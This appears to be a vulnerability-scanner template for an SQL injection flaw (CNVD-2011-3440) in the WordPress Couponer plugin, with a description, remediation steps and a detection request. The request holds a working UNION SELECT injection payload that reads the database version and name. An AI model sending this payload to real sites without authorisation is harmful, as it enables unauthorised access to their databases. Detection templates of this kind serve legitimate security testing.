id: CNVD-2011-3440
info:
  name: WordPress Couponer plugin <= 1.2 SQL Injection Vulnerability
  author:
  - l0ne1y
  description: |-
    WordPress Plugin Couponer 'ID' Parameter SQL Injection Vulnerability
    WordPress is a content management system developed using PHP language. There is a SQL injection vulnerability in the WordPress plug-in Couponer. Because the program fails to properly filter the input provided by the user before the SQL query, an attacker can use the vulnerability to access or modify data and exploit potential vulnerabilities in the underlying database.
  severity: high
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: https://wordpress.org/plugins/Couponer

    Temporary fix:
    1. Use precompiled statements. When using PDO, be careful not to splice variables directly into PDO statements. All query statements use the parameterized query interface provided by the database. Parameterized statements use parameters instead of embedding user input variables into the SQL statement. Almost all current database systems provide parameterized SQL statement execution interfaces. Using this interface can very effectively prevent SQL injection attacks.
    2. Escape or code the special characters (’”<>&*;, etc.) that enter the database.
    3. Confirm the type of each data. For example, numeric data must be numbers, and the storage fields in the database must correspond to int types.
    4. The data length should be strictly specified, which can prevent relatively long SQL injection statements from being executed correctly to a certain extent.
    5. The encoding of each data layer of the website is unified. It is recommended to use UTF-8 encoding for all data. Inconsistent encoding of the upper and lower layers may cause some filtering models to be bypassed.
    6. Strictly limit the database operation permissions of website users, and provide this user with permissions that are only sufficient for his or her work, thereby minimizing the harm of injection attacks to the database.
    7. Prevent the website from displaying SQL error messages, such as type errors, field mismatches, etc., to prevent attackers from using these error messages to make some judgments.
    8. Filter dangerous characters, for example: use regular expressions to match keywords such as union, sleep, and, select, load_file, etc. If a match is found, the operation will be terminated.
requests:
- matchers:
  - type: dsl
    dsl:
    - ' contains(body,"4beed3b9c4a886067de0e3a094246f78")'
  matchers-condition: and
  path:
  - '{{BaseURL}}/wp-content/plugins/couponer/print-coupon.php?ID=-1%27%20UNION%20ALL%20SELECT%201,version(),database(),MD5(3.14),5,6,7,8,9,10--%20'
  method: GET
